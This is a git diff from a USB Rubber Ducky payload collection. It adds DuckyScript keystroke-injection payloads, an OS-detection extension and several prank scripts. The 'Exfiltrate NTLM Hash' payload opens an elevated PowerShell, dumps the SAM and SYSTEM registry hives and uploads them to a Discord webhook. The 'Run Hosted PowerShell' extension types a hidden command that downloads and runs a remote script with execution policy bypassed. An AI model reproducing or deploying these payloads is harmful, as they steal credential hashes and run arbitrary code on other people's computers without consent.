REM_BLOCK DOCUMENTATION
|
||||
Title: Run Hosted PowerShell
|
||||
Author: PlumpyTurkey
|
||||
Description: This extension executes a hosted PowerShell script using the Windows Run dialog box.
|
||||
Target: Windows 10, 11
|
||||
Version: 1.0
|
||||
END_REM
|
||||
|
||||
REM Required options:
|
||||
DEFINE #RHP_SCRIPT_URL example.com
|
||||
|
||||
REM Advanced options:
|
||||
DEFINE #RHP_DELAY 2000
|
||||
DEFINE #RHP_ELEVATED_EXECUTION FALSE
|
||||
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
|
||||
|
||||
GUI r
|
||||
|
||||
DELAY #RHP_DELAY
|
||||
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
|
||||
|
||||
IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
|
||||
CTRL SHIFT ENTER
|
||||
DELAY #RHP_DELAY
|
||||
LEFT
|
||||
END_IF_DEFINED
|
||||
|
||||
ENTER
|
||||
|
||||
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
|
||||
ATTACKMODE OFF
|
||||
END_IF_DEFINED
|
||||
END_EXTENSION
|
||||
|
||||
RHP_RUN()
|
||||
|
|
|
@ -38,4 +38,24 @@ Functions available:
|
|||
- proto **$p "\<protocol>"**
|
||||
- *In this option you must put the protocol that you want to monitor, for example $proto="TCP" if you want to monitor TCP, else leave blank, so $proto="".*
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,28 @@
|
|||
# Exfiltrate NTLM Hash - Windows ✅
|
||||
|
||||
A script used to exfiltrate the NTLM hash on a Windows machine.
|
||||
|
||||
## Description
|
||||
|
||||
A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook. These files can than be used to extract the NTLM hash of all users.
|
||||
|
||||
### Settings
|
||||
|
||||
* Set the Discord webhook URL
|
||||
* Ensure the webhook permissions are configured
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Luu176 </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/luu176">
|
||||
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,34 @@
|
|||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
END_EXTENSION
|
||||
|
||||
DEFINE #DISCORD_WEBHOOK_URL DISCORD_WEBHOOK_URL_HERE
|
||||
GUI d
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRINGLN powershell Start-Process powershell -Verb runAs
|
||||
DELAY 3000
|
||||
LEFTARROW
|
||||
ENTER
|
||||
DELAY 3000
|
||||
STRINGLN C:\Windows\System32\reg save HKLM\SAM sam /y; C:\Windows\System32\reg save HKLM\SYSTEM system /y; Add-Type -AssemblyName "System.Net.Http"; $webhookUrl = "#DISCORD_WEBHOOK_URL"; $client = New-Object System.Net.Http.HttpClient; $fileStream1 = [System.IO.File]::OpenRead("sam"); $fileContent1 = New-Object System.Net.Http.StreamContent($fileStream1); $content1 = New-Object System.Net.Http.MultipartFormDataContent; $content1.Add($fileContent1, "file", "sam"); $client.PostAsync($webhookUrl, $content1).Result; $fileStream1.Close(); $fileStream2 = [System.IO.File]::OpenRead("system"); $fileContent2 = New-Object System.Net.Http.StreamContent($fileStream2); $content2 = New-Object System.Net.Http.MultipartFormDataContent; $content2.Add($fileContent2, "file", "system"); $client.PostAsync($webhookUrl, $content2).Result; $fileStream2.Close()
|
||||
DELAY 500
|
||||
GUI d
|
|
@ -0,0 +1,5 @@
|
|||
## 1 Script to Rule Them All
|
||||
|
||||
The purpose of this frankenstein mess is to use OS detection to run conditional code after, specific to the OS.
|
||||
|
||||
It differs from just combining the two extensions in very few ways, but there are slight improvement tweaks from my own testing (hence the new name to avoid conflicts) and more documentation on the process within.
|
|
@ -0,0 +1,293 @@
|
|||
REM Title: One Script To Rule Them All
|
||||
REM Author: Korben and UberGuidoZ
|
||||
REM Description: Attempt to detect OS then run conditional code based on result.
|
||||
REM Target: Windows, macOS, Linux, iOS, ChromeOS, Android, plus custom OS.
|
||||
REM Version: 1.6
|
||||
REM Category: All of them
|
||||
REM Source: https://github.com/UberGuidoZ/Hak5-USBRubberducky-Payloads
|
||||
|
||||
EXTENSION OS_DETECTION_UBER
|
||||
REM VERSION 2.0
|
||||
REM AUTHOR: Korben and UberGuidoZ
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USB Rubber Ducky Host OS Detection (moving target, may fall)
|
||||
Results may vary greatly depending on a combination of many variables:
|
||||
- number of testing stages
|
||||
- specific devices and versions tested against
|
||||
- number of systems testing for (scope)
|
||||
- detection techniques (passive/invisible/active/hybrid)
|
||||
- overall speed
|
||||
- overall accuracy
|
||||
|
||||
If all you require is Windows vs <any other os> detection, the PASSIVE_WINDOWS_DETECT extension is recommended over this one.
|
||||
|
||||
TARGET:
|
||||
DEFAULT - Windows, Mac, Linux
|
||||
ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android, custom defined OS
|
||||
|
||||
USAGE:
|
||||
Call DETECT_OS_UBER() anywhere in your payload after the extension.
|
||||
Place this extension and the DETECT_OS_UBER() before you would like to first reference $_OS to execute payload code conditionally.
|
||||
|
||||
FEEDBACK:
|
||||
As mentioned above, this a moving target (especially for macOS).
|
||||
Please report any issues identifying specific operating systems with as much detail as possible.
|
||||
Your feedback will greatly help solidify the robustness of this extension and others based on it.
|
||||
|
||||
DEBUGGING:
|
||||
SET DEBUGGING_OUTPUT DEFINE to TRUE, deploy on a target with text editor open for debug output
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION
|
||||
|
||||
REM For Debugging (use if troubleshooting or reporting issues):
|
||||
DEFINE #DEBUGGING_OUTPUT FALSE
|
||||
DEFINE #ADVANCED_DETECTION FALSE
|
||||
|
||||
REM Timing fine tuning:
|
||||
DEFINE #STARTUP_DELAY 1500
|
||||
DEFINE #RESTART_WAIT 1000
|
||||
DEFINE #EXECUTE_DELAY 2000
|
||||
DEFINE #CONNECT_WAIT 1000
|
||||
DEFINE #OS_DETECT_MODE HID
|
||||
REM Define Apple keyboard to keep macOS happy
|
||||
DEFINE #OS_DETECT_VID VID_05AC
|
||||
DEFINE #OS_DETECT_PID PID_021E
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #HOST_RESPONSE_TIMEOUT 1000
|
||||
|
||||
REM Start DETECT_OS function
|
||||
FUNCTION DETECT_OS_UBER()
|
||||
$_HOST_CONFIGURATION_REQUEST_COUNT = 0
|
||||
ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
|
||||
DELAY #STARTUP_DELAY
|
||||
SAVE_HOST_KEYBOARD_LOCK_STATE
|
||||
|
||||
REM Debugging if TRUE
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
IF_DEFINED_TRUE #ADVANCED_DETECTION
|
||||
STRING ADVANCED OS DETECT
|
||||
ELSE_DEFINED
|
||||
STRING OS DETECT
|
||||
END_IF_DEFINED
|
||||
ENTER
|
||||
STRING test caps
|
||||
END_IF_DEFINED
|
||||
|
||||
IF ($_CAPSLOCK_ON == FALSE) THEN
|
||||
LED_R
|
||||
CAPSLOCK
|
||||
DELAY #HOST_RESPONSE_TIMEOUT
|
||||
END_IF
|
||||
LED_OFF
|
||||
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING test done
|
||||
END_IF_DEFINED
|
||||
|
||||
IF $_RECEIVED_HOST_LOCK_LED_REPLY THEN
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING received led response
|
||||
END_IF_DEFINED
|
||||
LED_G
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING Prediction: Windows
|
||||
END_IF_DEFINED
|
||||
$_OS = WINDOWS
|
||||
ELSE
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING Prediction: Linux
|
||||
END_IF_DEFINED
|
||||
$_OS = LINUX
|
||||
END_IF
|
||||
ELSE
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING No LED response
|
||||
ENTER
|
||||
STRING Prediciton: MacOS
|
||||
END_IF_DEFINED
|
||||
$_OS = MACOS
|
||||
END_IF
|
||||
|
||||
IF_DEFINED_TRUE #ADVANCED_DETECTION
|
||||
IF ( $_OS == LINUX ) THEN
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING Soft reconnect
|
||||
END_IF_DEFINED
|
||||
ATTACKMODE OFF
|
||||
DELAY #RESTART_WAIT
|
||||
ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
|
||||
DELAY #CONNECT_WAIT
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING Reconnected
|
||||
END_IF_DEFINED
|
||||
IF ($_CAPSLOCK_ON == TRUE) THEN
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING Caps LED on
|
||||
ENTER
|
||||
STRING Test numlock
|
||||
END_IF_DEFINED
|
||||
NUMLOCK
|
||||
DELAY #HOST_RESPONSE_TIMEOUT
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING Test done
|
||||
END_IF_DEFINED
|
||||
IF ($_NUMLOCK_ON == FALSE) THEN
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING No numlock LED
|
||||
ENTER
|
||||
STRING Prediciton: ChromeOS
|
||||
END_IF_DEFINED
|
||||
$_OS = CHROMEOS
|
||||
ELSE
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING Numlock LED on
|
||||
ENTER
|
||||
STRING Testing scrolllock
|
||||
END_IF_DEFINED
|
||||
SCROLLLOCK
|
||||
DELAY #HOST_RESPONSE_TIMEOUT
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING Test done
|
||||
END_IF_DEFINED
|
||||
IF ($_SCROLLLOCK_ON == TRUE) THEN
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING Scrolllock LED on
|
||||
ENTER
|
||||
STRING Prediciton: Android
|
||||
END_IF_DEFINED
|
||||
$_OS = ANDROID
|
||||
ELSE
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING No scrolllock reply
|
||||
ENTER
|
||||
STRING Prediction: Linux
|
||||
END_IF_DEFINED
|
||||
$_OS = LINUX
|
||||
END_IF
|
||||
END_IF
|
||||
END_IF
|
||||
ELSE IF ($_OS == MACOS) THEN
|
||||
IF ($_CAPSLOCK_ON == TRUE) THEN
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING Caps LED on
|
||||
ENTER
|
||||
STRING Prediction: iOS
|
||||
END_IF_DEFINED
|
||||
$_OS = IOS
|
||||
ELSE
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING No caps reply
|
||||
ENTER
|
||||
STRING Prediction: MacOS
|
||||
END_IF_DEFINED
|
||||
$_OS = MACOS
|
||||
END_IF
|
||||
ELSE IF ($_OS == WINDOWS) THEN
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING Confident Windows Prediction
|
||||
END_IF_DEFINED
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
END_IF_DEFINED
|
||||
|
||||
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
||||
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING OS_DETECT complete
|
||||
ENTER
|
||||
END_IF_DEFINED
|
||||
END_FUNCTION
|
||||
END_EXTENSION
|
||||
|
||||
EXTENSION HELLO_OS_UBER
|
||||
REM VERSION 2.0
|
||||
REM AUTHOR: Korben and UberGuidoZ
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
For use with OS_DETECTION_UBERExtension, call HELLO_OS_UBER()
|
||||
after DETECT_OS_UBER() prints the OS determination. Make sure
|
||||
your custom conditional code is inserted below where commented.
|
||||
END_REM
|
||||
|
||||
REM Defining custom $_OS enums if desired
|
||||
DEFINE #EXTRA_EXAMPLES FALSE
|
||||
DEFINE #SOME_OTHER_OS 6
|
||||
DEFINE #ANOTHER_OS 7
|
||||
|
||||
FUNCTION HELLO_OS_UBER()
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
REM Windows code starts here
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRINGLN notepad
|
||||
DELAY 1000
|
||||
STRINGLN Legit DS3 on Windows
|
||||
REM Windows code ends here
|
||||
ELSE IF ($_OS == MACOS) THEN
|
||||
REM macOS code starts here
|
||||
DELAY 2000
|
||||
GUI SPACE
|
||||
DELAY 500
|
||||
STRINGLN TextEdit
|
||||
STRINGLN Legit DS3 on macOS
|
||||
REM macOS code ends here
|
||||
ELSE IF ($_OS == LINUX) THEN
|
||||
REM Linux code starts here
|
||||
DELAY 2000
|
||||
CTRL ALT t
|
||||
DELAY 100
|
||||
STRINGLN nano
|
||||
STRINGLN Legit DS3 on Linux
|
||||
REM Linux code ends here
|
||||
ELSE IF ($_OS == IOS) THEN
|
||||
REM iOS code starts here
|
||||
REM iOS code ends here
|
||||
ELSE IF ($_OS == CHROMEOS) THEN
|
||||
REM ChromeOS code starts here
|
||||
REM ChromeOS code ends here
|
||||
ELSE IF ($_OS == ANDROID) THEN
|
||||
REM Android code starts here
|
||||
REM Android code ends here
|
||||
IF_DEFINED_TRUE #EXTRA_EXAMPLES
|
||||
ELSE IF($_OS == #SOME_OTHER_OS) THEN
|
||||
REM Custom Other OS code starts here
|
||||
REM Custom Other OS code ends here
|
||||
ELSE IF($_OS == #ANOTHER_OS) THEN
|
||||
REM Another custom Other OS code starts here
|
||||
REM Another custom Other OS code ends here
|
||||
END_IF_DEFINED
|
||||
ELSE
|
||||
REM All else fails code starts here
|
||||
REM All else fails code ends here
|
||||
END_IF
|
||||
END_FUNCTION
|
||||
END_EXTENSION
|
||||
|
||||
REM Do the do! Change delay at beginning if desired.
|
||||
|
||||
DETECT_OS_UBER()
|
||||
DELAY #EXECUTE_DELAY
|
||||
HELLO_OS_UBER()
|
|
@ -18,10 +18,6 @@ Open a PowerShell, download the Python script and execute it. The Python script
|
|||
* ExecutionPolicy Bypass
|
||||
* Python
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
* Nothing to setup, it is Plug-And-Play
|
||||
|
@ -30,3 +26,25 @@ Open a PowerShell, download the Python script and execute it. The Python script
|
|||
|
||||
- Why is the code in one line?
|
||||
- In Python if TAB errors are made then execution is blocked so to avoid writing so many DuckyScript STRING elements I wrote everything in one line separating each command by a semicolon. However, the code can be viewed entirely in the script.py file and edited as desired.
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -21,3 +21,25 @@ Open a PowerShell, download the Python script and execute it. The Python script
|
|||
### Settings
|
||||
|
||||
- Setup your Python script link in the payload.txt file
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -17,11 +17,29 @@ Opens a shell, download the image, define the local image path, run a command KD
|
|||
* Internet Connection
|
||||
* Linux KDE
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
- Image link
|
||||
- Local image path
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -72,4 +72,24 @@ Exec=Exec=/usr/lib/code-oss/code-oss --unity-launch %F
|
|||
# ...
|
||||
```
|
||||
|
||||
![GIF](Change_The_App_That_Will_Be_Runned.gif)
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -23,3 +23,25 @@ Open a PowerShell, download the Python script and execute it. The Python script
|
|||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -18,10 +18,28 @@ Open a PowerShell, download the Python script and execute it. The Python script
|
|||
* Python installed
|
||||
* ExecutionPolicy Bypass
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
- Setup your Python script link in the payload.txt file
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -3,10 +3,10 @@ REM Title: Hacker Typer
|
|||
REM Author: UberGuidoZ
|
||||
REM Description: Opens a harmless website and types like a hacker
|
||||
REM Target: Windows but easily modified to work on any OS with a browser
|
||||
REM Version: 1.0
|
||||
REM Version: 1.1
|
||||
REM Category: Prank
|
||||
REM Source: https://github.com/UberGuidoZ/OMG-Payloads
|
||||
REM
|
||||
ATTACKMODE HID STORAGE
|
||||
DELAY 1500
|
||||
GUI r
|
||||
DELAY 1000
|
||||
|
|
|
@ -18,10 +18,28 @@ A script used to prank friends by playing songs through Spotify. Open a PowerShe
|
|||
* Spotify installed and user logged-in
|
||||
* ExecutionPolicy Bypass
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
- Setup the SONG-NAME that you want to play
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,5 @@
|
|||
# Resolution Prank
|
||||
|
||||
This payload will go into windows based systems and change the resolution of the victim to the lowest possible setting. When finished, the LED will flash red and green, and at that point if you hit CAPS it will reset the monitor to the highest resolution allowed.
|
||||
|
||||
### Somewhat resource dependent, may not work on older computers
|
|
@ -0,0 +1,103 @@
|
|||
REM TITLE Resolution Prank
|
||||
REM AUTHOR Mavisinator30001
|
||||
REM TARGET Any system running Windows 10/11
|
||||
REM DESCRIPTION Goes into Windows settings and change the screen resolution. When finished, toggle caps to change display back
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
IF $_OS != WINDOWS
|
||||
STOP_PAYLOAD
|
||||
END_IF
|
||||
LED_G
|
||||
DELAY 500
|
||||
CTRL GUI d
|
||||
DELAY 500
|
||||
GUI i
|
||||
DELAY 2000
|
||||
STRINGLN display
|
||||
DELAY 2500
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 200
|
||||
REPEAT 8 TAB
|
||||
ENTER
|
||||
VAR $CAPS_STATE = $_CAPSLOCK_ON
|
||||
WHILE ($CAPS_STATE == $_CAPSLOCK_ON)
|
||||
HOLD DOWN
|
||||
DELAY 1000
|
||||
RELEASE DOWN
|
||||
ENTER
|
||||
DELAY 200
|
||||
LEFT
|
||||
DELAY 200
|
||||
ENTER
|
||||
|
||||
REM WHEN FINISHED WITH THE FIRST PART OF THE PAYLOAD DUCK WILL FLASH LED
|
||||
VAR $LIGHT_UP_TIMES = 20
|
||||
WHILE ($LIGHT_UP_TIMES > 0)
|
||||
LED_G
|
||||
DELAY 300
|
||||
LED_OFF
|
||||
DELAY 300
|
||||
LED_R
|
||||
DELAY 300
|
||||
LED_OFF
|
||||
DELAY 300
|
||||
$LIGHT_UP_TIMES = $LIGHT_UP_TIMES - 1
|
||||
END_WHILE
|
||||
WAIT_FOR_CAPS_CHANGE
|
||||
END_WHILE
|
||||
DELAY 300
|
||||
REPEAT 12 TAB
|
||||
ENTER
|
||||
DELAY 200
|
||||
HOLD UP
|
||||
DELAY 1000
|
||||
RELEASE UP
|
||||
ENTER
|
||||
DELAY 200
|
||||
LEFT
|
||||
ENTER
|
||||
DELAY 1000
|
||||
ALT F4
|
||||
DELAY 200
|
||||
CTRL GUI F4
|
|
@ -5,9 +5,10 @@ REM
|
|||
REM Description: Creates a batch file that opens a Rick Roll every 5 mins in default browser
|
||||
REM Notes: Creates batch file, starts batch file, minimizes the window
|
||||
REM Target: Windows but fairly easily modified to work on any OS with a browser
|
||||
REM Version: 1.3
|
||||
REM Version: 1.5
|
||||
REM Category: Prank
|
||||
REM Source: https://github.com/UberGuidoZ/OMG-Payloads
|
||||
ATTACKMODE HID STORAGE
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 500
|
||||
|
@ -20,6 +21,7 @@ DELAY 1000
|
|||
STRING copy con rr.bat
|
||||
ENTER
|
||||
STRING @ECHO OFF
|
||||
ENTER
|
||||
STRING PING 127.0.0.1 -n 5 > NUL
|
||||
ENTER
|
||||
STRING :LOOP
|
||||
|
@ -30,7 +32,7 @@ STRING PING 127.0.0.1 -n 300 > NUL
|
|||
ENTER
|
||||
STRING GOTO LOOP
|
||||
ENTER
|
||||
CTRL C
|
||||
CTRL c
|
||||
DELAY 1000
|
||||
STRING cls && rr.bat
|
||||
ENTER
|
||||
|
|
|
@ -0,0 +1,118 @@
|
|||
# Same File Name Prank
|
||||
|
||||
This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **GNU/Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names.
|
||||
|
||||
Specifically, the ability to add a blank space to the end of the name is used. On Windows systems, if file extension viewing is not enabled the names will look identical to the human eye, while on GNU/Linux systems the difference may be more easily noticed.
|
||||
|
||||
